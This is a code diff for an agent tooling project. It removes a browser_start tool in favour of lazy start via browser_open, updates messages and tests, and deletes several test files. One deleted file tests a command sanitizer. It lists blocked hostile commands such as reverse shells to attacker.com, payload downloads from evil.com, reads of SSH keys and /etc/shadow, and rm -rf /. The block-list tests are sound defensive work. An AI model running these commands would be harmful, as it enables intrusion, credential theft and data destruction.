@@ -642,7 +642,7 @@ def register_inspection_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_snapshot", params, result=result)
return result
@@ -727,7 +727,7 @@ def register_inspection_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_html", params, result=result)
return result
+11 -11
View File
@@ -153,7 +153,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_click", params, result=result)
return result
@@ -247,7 +247,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_click_coordinate", params, result=result)
return _text_only(result)
@@ -352,7 +352,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_type", params, result=result)
return result
@@ -432,7 +432,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_type_focused", params, result=result)
return result
@@ -506,7 +506,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_press", params, result=result)
return result
@@ -560,7 +560,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_hover", params, result=result)
return result
@@ -627,7 +627,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_hover_coordinate", params, result=result)
return _text_only(result)
@@ -712,7 +712,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_press_at", params, result=result)
return _text_only(result)
@@ -782,7 +782,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_select", params, result=result)
return result
@@ -860,7 +860,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_scroll", params, result=result)
return result
@@ -924,7 +924,7 @@ def register_interaction_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_drag", params, result=result)
return result
+3 -60
View File
@@ -61,7 +61,7 @@ async def _ensure_context(
Lazy-creates the browser context (tab group + seed tab) the first time
a profile is used so URL-taking tools (``browser_open`` /
``browser_navigate``) can be the agent's single cold-start entry
point instead of forcing an explicit ``browser_start`` round trip.
point — no separate "start" tool to remember.
Caller must verify ``bridge`` is connected first; any failure in
``bridge.create_context`` propagates so the caller's existing
@@ -137,7 +137,7 @@ def register_lifecycle_tools(mcp: FastMCP) -> None:
return {
"ok": True,
"connected": True,
"status": "Extension is connected and ready. Call browser_start to begin.",
"status": "Extension is connected and ready. Call browser_open(url) to begin.",
}
return {
@@ -150,7 +150,7 @@ def register_lifecycle_tools(mcp: FastMCP) -> None:
"step_3": "Click 'Load unpacked'",
"step_4": f"Select this directory: {ext_path}",
"step_5": ("Click the extension icon in the Chrome toolbar to confirm it says 'Connected'"),
"step_6": "Return here and call browser_start",
"step_6": "Return here and call browser_open(url) to begin",
},
"extensionPath": ext_path,
"extensionPathExists": ext_exists,
@@ -238,63 +238,6 @@ def register_lifecycle_tools(mcp: FastMCP) -> None:
)
return result
@mcp.tool()
async def browser_start(profile: str | None = None) -> dict:
"""
Explicitly create a browser context (tab group) for ``profile``.
Most workflows do NOT need to call this directly: ``browser_open``
and ``browser_navigate`` lazy-create a context on first use, so a
single ``browser_open(url)`` covers the cold path. Reach for
``browser_start`` when you want to (a) warm a profile without
opening a URL yet, or (b) recreate a context after
``browser_stop`` to clear stale state.
No separate browser process is launched — uses the user's
existing Chrome via the Beeline extension.
Args:
profile: Browser profile name (default: "default")
Returns:
Dict with start status (``"started"`` on fresh creation,
``"already_running"`` when a context for the profile exists),
including ``groupId`` and ``activeTabId``.
"""
start = time.perf_counter()
params = {"profile": profile}
bridge = get_bridge()
if not bridge or not bridge.is_connected:
result = {
"ok": False,
"error": ("Browser extension not connected. Call browser_setup for installation instructions."),
}
log_tool_call("browser_start", params, result=result)
return result
try:
profile_name, ctx, created = await _ensure_context(bridge, profile)
result = {
"ok": True,
"status": "started" if created else "already_running",
"profile": profile_name,
"groupId": ctx.get("groupId"),
"activeTabId": ctx.get("activeTabId"),
}
log_tool_call(
"browser_start",
params,
result=result,
duration_ms=(time.perf_counter() - start) * 1000,
)
return result
except Exception as e:
logger.exception("Failed to start browser context")
result = {"ok": False, "error": str(e)}
log_tool_call("browser_start", params, error=e, duration_ms=(time.perf_counter() - start) * 1000)
return result
@mcp.tool()
async def browser_stop(profile: str | None = None) -> dict:
"""
+7 -8
View File
@@ -33,11 +33,10 @@ def register_navigation_tools(mcp: FastMCP) -> None:
"""
Navigate a tab to a URL.
Lazy-creates a browser context if none exists (no need to call
``browser_start`` first); when no ``tab_id`` is given and the
context was just created, navigation lands on the seed tab.
Prefer ``browser_open`` when you specifically want a new tab —
``browser_navigate`` is for redirecting an existing tab.
Lazy-creates a browser context if none exists; when no ``tab_id``
is given and the context was just created, navigation lands on
the seed tab. Prefer ``browser_open`` when you specifically want
a new tab — ``browser_navigate`` is for redirecting an existing tab.
Waits for the page to reach the ``wait_until`` condition before
returning.
@@ -130,7 +129,7 @@ def register_navigation_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_go_back", params, result=result)
return result
@@ -180,7 +179,7 @@ def register_navigation_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_go_forward", params, result=result)
return result
@@ -235,7 +234,7 @@ def register_navigation_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_reload", params, result=result)
return result
+9 -9
View File
@@ -65,7 +65,7 @@ def register_tab_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_tabs", params, result=result)
return result
@@ -100,12 +100,12 @@ def register_tab_tools(mcp: FastMCP) -> None:
"""
Open a browser tab at the given URL — preferred entry point.
This is the agent's primary "go to a page" tool. If no browser
context exists yet for the profile, one is created transparently
(no need to call ``browser_start`` first). The first call after
a fresh context reuses the seed ``about:blank`` tab; subsequent
calls open new tabs in the agent's tab group. Waits for the
page to load before returning.
This is the agent's primary "go to a page" tool and the cold-start
entry point — if no browser context exists yet for the profile,
one is created transparently. The first call after a fresh
context reuses the seed ``about:blank`` tab; subsequent calls
open new tabs in the agent's tab group. Waits for the page to
load before returning.
Args:
url: URL to navigate to
@@ -192,7 +192,7 @@ def register_tab_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_close", params, result=result)
return result
@@ -271,7 +271,7 @@ def register_tab_tools(mcp: FastMCP) -> None:
ctx = _get_context(profile)
if not ctx:
result = {"ok": False, "error": "Browser not started. Call browser_start first."}
result = {"ok": False, "error": "Browser not started. Call browser_open(url) first to open a tab."}
log_tool_call("browser_activate_tab", params, result=result)
return result
@@ -71,17 +71,10 @@ def build_exec_envelope(
# the foundational skill documents). For simplicity we always
# store both when either overflows so the agent can fetch the
# other stream in full too if it wants.
combined = (
b"--- stdout ---\n"
+ stdout_bytes
+ b"\n--- stderr ---\n"
+ stderr_bytes
)
combined = b"--- stdout ---\n" + stdout_bytes + b"\n--- stderr ---\n" + stderr_bytes
output_handle = store.put(combined)
semantic_status, semantic_message = classify(
command, exit_code, timed_out=timed_out, signaled=signaled
)
semantic_status, semantic_message = classify(command, exit_code, timed_out=timed_out, signaled=signaled)
warning = get_warning(command)
+3 -4
View File
@@ -53,9 +53,7 @@ if TYPE_CHECKING:
# directly — the alternative is spawning the first program with the rest
# of the line as junk argv, which either errors or returns fake success
# (e.g. `echo "..." && ps ...` → echo prints the literal command).
_SHELL_METACHARS: frozenset[str] = frozenset(
{"|", "&&", "||", ";", ">", "<", ">>", "<<", "&", "2>", "2>&1", "|&"}
)
_SHELL_METACHARS: frozenset[str] = frozenset({"|", "&&", "||", ";", ">", "<", ">>", "<<", "&", "2>", "2>&1", "|&"})
def register_exec_tools(mcp: FastMCP) -> None:
@@ -126,7 +124,8 @@ def register_exec_tools(mcp: FastMCP) -> None:
return _err_envelope(command, "command was empty")
if any(t in _SHELL_METACHARS for t in tokens) or any(
# globs that shlex left unexpanded (`*`, `?`, `[`)
any(c in t for c in "*?[") and t != "[" for t in tokens
any(c in t for c in "*?[") and t != "["
for t in tokens
):
auto_shell = True
+11 -17
View File
@@ -20,7 +20,6 @@ from gcu.browser.bridge import BeelineBridge
from gcu.browser.tools.advanced import register_advanced_tools
from gcu.browser.tools.inspection import register_inspection_tools
from gcu.browser.tools.interactions import register_interaction_tools
from gcu.browser.tools.lifecycle import register_lifecycle_tools
from gcu.browser.tools.navigation import register_navigation_tools
from gcu.browser.tools.tabs import register_tab_tools
@@ -107,22 +106,17 @@ class TestMultipleSubagentsTabGroups:
mock_bridge.create_context = AsyncMock(side_effect=mock_create_context)
# Register tools first
register_lifecycle_tools(mcp)
browser_start = mcp._tool_manager._tools["browser_start"].fn
from gcu.browser.tools.lifecycle import _ensure_context
# Now patch for execution
with patch("gcu.browser.tools.lifecycle.get_bridge", return_value=mock_bridge):
# Simulate 3 different subagents starting browsers
results = await asyncio.gather(
browser_start(profile="agent_1"),
browser_start(profile="agent_2"),
browser_start(profile="agent_3"),
)
results = await asyncio.gather(
_ensure_context(mock_bridge, "agent_1"),
_ensure_context(mock_bridge, "agent_2"),
_ensure_context(mock_bridge, "agent_3"),
)
# Each should have created a separate context
assert mock_bridge.create_context.call_count == 3
assert all(r.get("ok") for r in results)
assert all(created for (_, _, created) in results)
@pytest.mark.asyncio
async def test_concurrent_tab_operations_different_groups(self, mcp: FastMCP, mock_bridge: MagicMock):
@@ -709,11 +703,11 @@ class TestErrorHandling:
mock_bridge = MagicMock(spec=BeelineBridge)
mock_bridge.is_connected = False
register_lifecycle_tools(mcp)
browser_start = mcp._tool_manager._tools["browser_start"].fn
register_tab_tools(mcp)
browser_open = mcp._tool_manager._tools["browser_open"].fn
with patch("gcu.browser.tools.lifecycle.get_bridge", return_value=mock_bridge):
result = await browser_start(profile="test")
with patch("gcu.browser.tools.tabs.get_bridge", return_value=mock_bridge):
result = await browser_open(url="https://example.com", profile="test")
assert result.get("ok") is False
assert "not connected" in result.get("error", "").lower()
+1 -3
View File
@@ -20,9 +20,7 @@ def test_register_chart_tools_lands_all(mcp):
from chart_tools import register_chart_tools
names = register_chart_tools(mcp)
assert set(names) == EXPECTED_TOOLS, (
f"missing: {EXPECTED_TOOLS - set(names)}, extra: {set(names) - EXPECTED_TOOLS}"
)
assert set(names) == EXPECTED_TOOLS, f"missing: {EXPECTED_TOOLS - set(names)}, extra: {set(names) - EXPECTED_TOOLS}"
def test_all_tools_have_chart_prefix(mcp):
-238
View File
@@ -1,238 +0,0 @@
"""Tests for command_sanitizer — validates that dangerous commands are blocked
while normal development commands pass through unmodified."""
import pytest
from aden_tools.tools.file_system_toolkits.command_sanitizer import (
CommandBlockedError,
validate_command,
)
# ---------------------------------------------------------------------------
# Safe commands that MUST pass validation
# ---------------------------------------------------------------------------
class TestSafeCommands:
"""Common dev commands that should never be blocked."""
@pytest.mark.parametrize(
"cmd",
[
"echo hello",
"echo 'Hello World'",
"uv run pytest tests/ -v",
"uv pip install requests",
"git status",
"git diff --cached",
"git log -n 5",
"git add .",
"git commit -m 'fix: typo'",
"python script.py",
"python -m pytest",
"python3 script.py",
"python manage.py migrate",
"ls -la",
"dir /a",
"cat README.md",
"head -n 20 file.py",
"tail -f log.txt",
"grep -r 'pattern' src/",
"find . -name '*.py'",
"ruff check .",
"ruff format --check .",
"mypy src/",
"npm install",
"npm run build",
"npm test",
"node server.js",
"make test",
"make check",
"cargo build",
"go build ./...",
"dotnet build",
"pip install -r requirements.txt",
"cd src && ls",
"echo hello && echo world",
"cat file.py | grep pattern",
"pytest tests/ -v --tb=short",
"rm temp.txt",
"rm -f temp.log",
"del temp.txt",
"mkdir -p output/logs",
"cp file1.py file2.py",
"mv old.txt new.txt",
"wc -l *.py",
"sort output.txt",
"diff file1.py file2.py",
"tree src/",
"curl https://api.example.com/data",
"curl -X POST -H 'Content-Type: application/json' https://api.example.com",
],
)
def test_safe_command_passes(self, cmd):
"""Should not raise for common dev commands."""
validate_command(cmd) # should not raise
def test_empty_command(self):
"""Empty and whitespace-only commands should pass."""
validate_command("")
validate_command(" ")
validate_command(None) # type: ignore[arg-type] — edge case
# ---------------------------------------------------------------------------
# Dangerous commands that MUST be blocked
# ---------------------------------------------------------------------------
class TestBlockedExecutables:
"""Commands using blocked executables should raise CommandBlockedError."""
@pytest.mark.parametrize(
"cmd",
[
# Network exfiltration
"wget http://evil.com/payload",
"nc -e /bin/sh attacker.com 4444",
"ncat attacker.com 1234",
"nmap -sS 192.168.1.0/24",
"ssh user@remote",
"scp file.txt user@remote:/tmp/",
"ftp ftp.example.com",
"telnet example.com 80",
"rsync -avz . user@remote:/data",
# Windows network tools
"invoke-webrequest https://evil.com",
"iwr https://evil.com",
"certutil -urlcache -split -f http://evil.com/payload",
# User escalation
"useradd hacker",
"userdel admin",
"adduser hacker",
"passwd root",
"net user hacker P@ss123 /add",
"net localgroup administrators hacker /add",
# System destructive
"shutdown /s /t 0",
"reboot",
"halt",
"poweroff",
"mkfs.ext4 /dev/sda1",
"diskpart",
# Shell interpreters (direct invocation)
"bash -c 'echo hacked'",
"sh -c 'rm -rf /'",
"powershell -Command Get-Process",
"pwsh -c 'ls'",
"cmd /c dir",
"cmd.exe /c dir",
],
)
def test_blocked_executable(self, cmd):
"""Should raise CommandBlockedError for dangerous executables."""
with pytest.raises(CommandBlockedError):
validate_command(cmd)
class TestBlockedPatterns:
"""Commands matching dangerous patterns should be blocked."""
@pytest.mark.parametrize(
"cmd",
[
# Recursive delete of root / home
"rm -rf /",
"rm -rf ~",
"rm -rf ..",
"rm -rf C:\\",
"rm -f -r /",
# sudo
"sudo apt install something",
"sudo rm -rf /var/log",
# Reverse shell indicators
"bash -i >& /dev/tcp/10.0.0.1/4444",
# Credential theft
"cat ~/.ssh/id_rsa",
"cat /etc/shadow",
"cat something/credential_key",
"type something\\credential_key",
# Command substitution with dangerous tools
"echo `wget http://evil.com`",
# Environment variable exfiltration
"echo $API_KEY",
"echo ${SECRET_TOKEN}",
],
)
def test_blocked_pattern(self, cmd):
"""Should raise CommandBlockedError for dangerous patterns."""
with pytest.raises(CommandBlockedError):
validate_command(cmd)
class TestChainedCommands:
"""Dangerous commands hidden in compound statements should be caught."""
@pytest.mark.parametrize(
"cmd",
[
"echo hi && wget http://evil.com/payload",
"echo hi || ssh attacker@remote",
"ls | nc attacker.com 4444",
"echo safe; bash -c 'evil stuff'",
"git status; shutdown /s /t 0",
],
)
def test_chained_dangerous_command(self, cmd):
"""Dangerous commands chained with safe ones should be blocked."""
with pytest.raises(CommandBlockedError):
validate_command(cmd)
class TestEdgeCases:
"""Edge cases and possible bypass attempts."""
def test_env_var_prefix_does_not_bypass(self):
"""FOO=bar wget ... should still be blocked."""
with pytest.raises(CommandBlockedError):
validate_command("FOO=bar wget http://evil.com")
@pytest.mark.parametrize(
"cmd",
[
"/usr/bin/wget https://attacker.com",
"C:\\Windows\\System32\\cmd.exe /c dir",
],
)
def test_directory_prefix_does_not_bypass(self, cmd):
"""Absolute executable paths should still match the blocklist."""
with pytest.raises(CommandBlockedError):
validate_command(cmd)
def test_case_insensitive_blocking(self):
"""Blocking should be case-insensitive."""
with pytest.raises(CommandBlockedError):
validate_command("Wget http://evil.com")
def test_exe_suffix_stripped(self):
"""cmd.exe should be blocked same as cmd."""
with pytest.raises(CommandBlockedError):
validate_command("cmd.exe /c dir")
def test_safe_rm_without_dangerous_target(self):
"""rm of a specific file (not root/home) should pass."""
validate_command("rm temp.txt")
validate_command("rm -f output.log")
def test_python_commands_are_safe(self):
"""python commands (including -c) are allowed for agent scripting."""
validate_command("python script.py")
validate_command("python -m pytest tests/")
validate_command("python3 -c 'print(1)'")
validate_command("python -c 'import json; print(json.dumps({}))'")
validate_command("node -e 'console.log(1)'")
def test_error_message_is_descriptive(self):
"""Blocked commands should include a useful error message."""
with pytest.raises(CommandBlockedError, match="blocked for safety"):
validate_command("wget http://evil.com")
+1 -3
View File
@@ -63,9 +63,7 @@ def test_merge_stderr(job_tools):
merge_stderr=True,
)
job_id = started["job_id"]
result = job_tools["logs"](
job_id=job_id, stream="merged", wait_until_exit=True, wait_timeout_sec=5
)
result = job_tools["logs"](job_id=job_id, stream="merged", wait_until_exit=True, wait_timeout_sec=5)
assert "stdout1" in result["data"]
assert "stderr1" in result["data"]
+1 -3
View File
@@ -20,9 +20,7 @@ def test_register_terminal_tools_lands_all_ten(mcp):
from terminal_tools import register_terminal_tools
names = register_terminal_tools(mcp)
assert set(names) == EXPECTED_TOOLS, (
f"missing: {EXPECTED_TOOLS - set(names)}, extra: {set(names) - EXPECTED_TOOLS}"
)
assert set(names) == EXPECTED_TOOLS, f"missing: {EXPECTED_TOOLS - set(names)}, extra: {set(names) - EXPECTED_TOOLS}"
def test_all_tools_have_terminal_prefix(mcp):
+6 -4
View File
@@ -56,10 +56,12 @@ async def reproduce_agent_session(session: BrowserSession):
print("=" * 100)
total_start = time.time()
# ── Turn 1 (seq 1-2): browser_start ──────────────────────────────────
# ── Turn 1 (seq 1-2): session start ──────────────────────────────────
# Original 2026-02 transcript called the now-deleted browser_start MCP
# tool here; cold-start is now folded into browser_open via lazy-start.
t0 = time.time()
result = await session.start(headless=False, persistent=True)
log(1, "browser_start()", f"ok={result['ok']}, status={result.get('status')}", time.time() - t0)
log(1, "session.start()", f"ok={result['ok']}, status={result.get('status')}", time.time() - t0)
# ── Turn 2 (seq 3-4): browser_open ───────────────────────────────────
t0 = time.time()
@@ -235,10 +237,10 @@ async def demonstrate_correct_approach(session: BrowserSession):
print("=" * 100)
total_start = time.time()
# ── Turn 1: browser_start ────────────────────────────────────────────
# ── Turn 1: session start ────────────────────────────────────────────
t0 = time.time()
result = await session.start(headless=False, persistent=True)
log(1, "browser_start()", f"ok={result['ok']}", time.time() - t0)
log(1, "session.start()", f"ok={result['ok']}", time.time() - t0)
# ── Turn 2: browser_open + browser_wait for SPA ──────────────────────
t0 = time.time()
-126
View File
@@ -1,126 +0,0 @@
"""Tests for example_tool - A simple text processing tool."""
import pytest
from fastmcp import FastMCP
from aden_tools.tools.example_tool.example_tool import register_tools
@pytest.fixture
def example_tool_fn(mcp: FastMCP):
"""Register and return the example_tool function."""
register_tools(mcp)
return mcp._tool_manager._tools["example_tool"].fn
class TestExampleTool:
"""Tests for example_tool function."""
def test_valid_message(self, example_tool_fn):
"""Basic message returns unchanged."""
result = example_tool_fn(message="Hello, World!")
assert result == "Hello, World!"
def test_uppercase_true(self, example_tool_fn):
"""uppercase=True converts message to uppercase."""
result = example_tool_fn(message="hello", uppercase=True)
assert result == "HELLO"
def test_uppercase_false(self, example_tool_fn):
"""uppercase=False (default) preserves case."""
result = example_tool_fn(message="Hello", uppercase=False)
assert result == "Hello"
def test_repeat_multiple(self, example_tool_fn):
"""repeat=3 joins message with spaces."""
result = example_tool_fn(message="Hi", repeat=3)
assert result == "Hi Hi Hi"
def test_repeat_default(self, example_tool_fn):
"""repeat=1 (default) returns single message."""
result = example_tool_fn(message="Hello", repeat=1)
assert result == "Hello"
def test_uppercase_and_repeat_combined(self, example_tool_fn):
"""uppercase and repeat work together."""
result = example_tool_fn(message="hi", uppercase=True, repeat=2)
assert result == "HI HI"
def test_empty_message_error(self, example_tool_fn):
"""Empty string returns error string."""
result = example_tool_fn(message="")
assert "Error" in result
assert "1-1000" in result
def test_message_too_long_error(self, example_tool_fn):
"""Message over 1000 chars returns error string."""
long_message = "x" * 1001
result = example_tool_fn(message=long_message)
assert "Error" in result
assert "1-1000" in result
def test_message_at_max_length(self, example_tool_fn):
"""Message exactly 1000 chars is valid."""
max_message = "x" * 1000
result = example_tool_fn(message=max_message)
assert result == max_message
def test_repeat_zero_error(self, example_tool_fn):
"""repeat=0 returns error string."""
result = example_tool_fn(message="Hi", repeat=0)
assert "Error" in result
assert "1-10" in result
def test_repeat_eleven_error(self, example_tool_fn):
"""repeat=11 returns error string."""
result = example_tool_fn(message="Hi", repeat=11)
assert "Error" in result
assert "1-10" in result
def test_repeat_at_max(self, example_tool_fn):
"""repeat=10 (maximum) is valid."""
result = example_tool_fn(message="Hi", repeat=10)
assert result == " ".join(["Hi"] * 10)
def test_repeat_negative_error(self, example_tool_fn):
"""Negative repeat returns error string."""
result = example_tool_fn(message="Hi", repeat=-1)
assert "Error" in result
assert "1-10" in result
def test_whitespace_only_message(self, example_tool_fn):
"""Whitespace-only message is valid (non-empty)."""
result = example_tool_fn(message=" ")
assert result == " "
def test_special_characters_in_message(self, example_tool_fn):
"""Special characters are preserved."""
result = example_tool_fn(message="Hello! @#$%^&*()")
assert result == "Hello! @#$%^&*()"
def test_unicode_message(self, example_tool_fn):
"""Unicode characters are handled correctly."""
result = example_tool_fn(message="Hello 世界 🌍")
assert result == "Hello 世界 🌍"
def test_unicode_uppercase(self, example_tool_fn):
"""Unicode uppercase conversion works."""
result = example_tool_fn(message="café", uppercase=True)
assert result == "CAFÉ"
+3 -16
View File
@@ -280,7 +280,7 @@ class TestPatchToolReplaceMode:
result = edit_fn(
mode="replace",
path="b.py",
old_string='print(“hi”)',
old_string="print(“hi”)",
new_string='print("HELLO")',
)
assert "Error" not in result
@@ -331,14 +331,7 @@ class TestPatchToolPatchMode:
"""A V4A Update hunk replaces matched lines and writes."""
target = tmp_path / "u.py"
target.write_text("def f():\n return 1\n", encoding="utf-8")
body = (
"*** Begin Patch\n"
"*** Update File: u.py\n"
" def f():\n"
"- return 1\n"
"+ return 42\n"
"*** End Patch\n"
)
body = "*** Begin Patch\n*** Update File: u.py\n def f():\n- return 1\n+ return 42\n*** End Patch\n"
edit_fn = _get_tool_fn(file_ops_mcp, "edit_file")
result = edit_fn(mode="patch", patch_text=body)
assert "Error" not in result
@@ -347,13 +340,7 @@ class TestPatchToolPatchMode:
def test_patch_add_file(self, file_ops_mcp, tmp_path):
"""Add File: creates a new file from + lines."""
body = (
"*** Begin Patch\n"
"*** Add File: new.py\n"
"+# new\n"
"+x = 1\n"
"*** End Patch\n"
)
body = "*** Begin Patch\n*** Add File: new.py\n+# new\n+x = 1\n*** End Patch\n"
edit_fn = _get_tool_fn(file_ops_mcp, "edit_file")
result = edit_fn(mode="patch", patch_text=body)
assert "Error" not in result
@@ -1,226 +0,0 @@
"""Tests for the remaining file_system_toolkits — execute_command_tool only.
The file tools (read_file, write_file, edit_file, hashline_edit, search_files,
apply_patch) all live in aden_tools.file_ops and are tested in test_file_ops.py.
"""
import asyncio
import os
import sys
from unittest.mock import patch
import pytest
from fastmcp import FastMCP
@pytest.fixture
def mcp():
    """Provide a fresh FastMCP server instance for each test."""
    server = FastMCP("test-server")
    return server
@pytest.fixture
def mock_workspace():
    """Keyword arguments that identify the test agent to the shell tool."""
    workspace = {"agent_id": "test-agent"}
    return workspace
@pytest.fixture
def mock_secure_path(tmp_path):
    """Redirect the shell tool's sandbox resolution into pytest's tmp_path."""

    def _resolve(path, agent_id):
        # Mirror the real resolver's signature but root everything under tmp_path.
        return os.path.join(tmp_path, path)

    resolver_patch = patch(
        "aden_tools.tools.file_system_toolkits.execute_command_tool.execute_command_tool.get_sandboxed_path",
        side_effect=_resolve,
    )
    sandbox_dir_patch = patch(
        "aden_tools.tools.file_system_toolkits.execute_command_tool.execute_command_tool.AGENT_SANDBOXES_DIR",
        str(tmp_path),
    )
    with resolver_patch, sandbox_dir_patch:
        yield
class TestExecuteCommandTool:
    """Tests for execute_command_tool.

    Covers synchronous execution, per-call timeouts, event-loop
    friendliness, and the background-job lifecycle (start / poll /
    kill / cross-agent isolation).
    """

    @pytest.fixture
    def execute_command_fn(self, mcp):
        """Register the toolkit and expose the raw execute_command_tool function."""
        from aden_tools.tools.file_system_toolkits.execute_command_tool import register_tools

        register_tools(mcp)
        # Reach into FastMCP's private tool manager so tests can await the
        # implementation directly instead of going through the MCP protocol.
        return mcp._tool_manager._tools["execute_command_tool"].fn

    async def test_execute_simple_command(self, execute_command_fn, mock_workspace, mock_secure_path):
        """Executing a simple command returns output."""
        result = await execute_command_fn(command="echo 'Hello World'", **mock_workspace)
        assert result["success"] is True
        assert result["return_code"] == 0
        assert "Hello World" in result["stdout"]

    async def test_execute_failing_command(self, execute_command_fn, mock_workspace, mock_secure_path):
        """Executing a failing command returns non-zero exit code.

        Note: "success" means the command ran to completion; the non-zero
        exit status is reported separately via return_code.
        """
        result = await execute_command_fn(command="exit 1", **mock_workspace)
        assert result["success"] is True
        assert result["return_code"] == 1

    async def test_execute_command_with_stderr(self, execute_command_fn, mock_workspace, mock_secure_path):
        """Executing a command that writes to stderr captures it."""
        result = await execute_command_fn(command="echo 'error message' >&2", **mock_workspace)
        assert result["success"] is True
        assert "error message" in result.get("stderr", "")

    async def test_execute_command_list_files(self, execute_command_fn, mock_workspace, mock_secure_path, tmp_path):
        """Executing ls command lists files."""
        (tmp_path / "testfile.txt").write_text("content", encoding="utf-8")
        result = await execute_command_fn(command=f"ls {tmp_path}", **mock_workspace)
        assert result["success"] is True
        assert result["return_code"] == 0
        assert "testfile.txt" in result["stdout"]

    async def test_execute_command_with_pipe(self, execute_command_fn, mock_workspace, mock_secure_path):
        """Executing a command with pipe works correctly."""
        result = await execute_command_fn(command="echo 'hello world' | tr 'a-z' 'A-Z'", **mock_workspace)
        assert result["success"] is True
        assert result["return_code"] == 0
        assert "HELLO WORLD" in result["stdout"]

    @pytest.fixture
    def bash_output_fn(self, mcp):
        """Expose the bash_output polling tool registered by the same toolkit."""
        from aden_tools.tools.file_system_toolkits.execute_command_tool import register_tools

        register_tools(mcp)
        return mcp._tool_manager._tools["bash_output"].fn

    @pytest.fixture
    def bash_kill_fn(self, mcp):
        """Expose the bash_kill tool registered by the same toolkit."""
        from aden_tools.tools.file_system_toolkits.execute_command_tool import register_tools

        register_tools(mcp)
        return mcp._tool_manager._tools["bash_kill"].fn

    async def test_per_call_timeout_overrides_default(self, execute_command_fn, mock_workspace, mock_secure_path):
        """A per-call timeout under the default kills the command early."""
        import time

        start = time.monotonic()
        result = await execute_command_fn(
            command="sleep 10",
            timeout_seconds=1,
            **mock_workspace,
        )
        elapsed = time.monotonic() - start
        assert result.get("timed_out") is True
        assert "1 seconds" in result.get("error", "")
        # Generous 5s bound: proves the 1s timeout fired while tolerating CI jitter.
        assert elapsed < 5, f"timeout did not kill the command promptly ({elapsed:.2f}s)"

    async def test_timeout_is_clamped_upwards(self, execute_command_fn, mock_workspace, mock_secure_path):
        """A timeout above the 600s ceiling is silently clamped."""
        result = await execute_command_fn(
            command="echo fast",
            timeout_seconds=99999,
            **mock_workspace,
        )
        assert result["success"] is True
        assert "fast" in result["stdout"]

    async def test_event_loop_unblocked_while_command_runs(self, execute_command_fn, mock_workspace, mock_secure_path):
        """The event loop keeps servicing other tasks while a bash command runs."""
        ticks = 0

        async def ticker():
            nonlocal ticks
            for _ in range(20):
                await asyncio.sleep(0.05)
                ticks += 1

        ticker_task = asyncio.create_task(ticker())
        result = await execute_command_fn(command="sleep 0.5", **mock_workspace)
        await ticker_task
